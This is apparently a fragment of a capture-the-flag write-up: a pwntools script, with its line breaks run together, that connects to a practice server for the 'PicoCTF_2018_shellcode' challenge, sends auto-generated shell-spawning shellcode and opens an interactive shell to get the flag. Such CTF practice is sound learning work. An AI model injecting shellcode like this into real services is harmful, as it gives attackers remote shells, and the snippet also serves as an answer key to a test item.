io =remote('node3.buuoj.cn',29911)context.binary='PicoCTF_2018_shellcode'shellcode= asm(shellcraft.sh())#可以自动生成二进制文件对应架构的shellcodeio.sendline(shellcode)io.interactive() get flag